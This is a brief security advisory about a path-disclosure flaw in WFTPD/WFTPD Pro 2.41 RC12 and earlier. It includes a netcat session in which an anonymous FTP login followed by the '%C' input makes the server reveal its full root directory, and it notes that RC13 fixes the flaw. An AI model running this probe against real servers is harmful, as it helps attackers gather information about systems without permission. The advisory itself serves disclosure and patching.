COMMAND

    WFTPD

SYSTEMS AFFECTED

    WFTPD/WFTPD Pro 2.41 RC12, and prior.

PROBLEM

    Michael (Blue Panda) found following.   Use of the "magic  cookie"
    %C reveals the full path of the current directory, ie:

        C:\>nc panda 21
        220 WFTPD 2.4 service (by Texas Imperial Software) ready for new user
        user anonymous
        331-Anonymous user access allowed - please enter your email
        331-address as the password:
        331 Give me your password, please
        pass
        230 Logged in successfully
        %C
        500 Unidentified command D:\FTPROOT\

SOLUTION

    A fix has been released.  WFTPD/WFTPD Pro 2.41 RC13 is immune.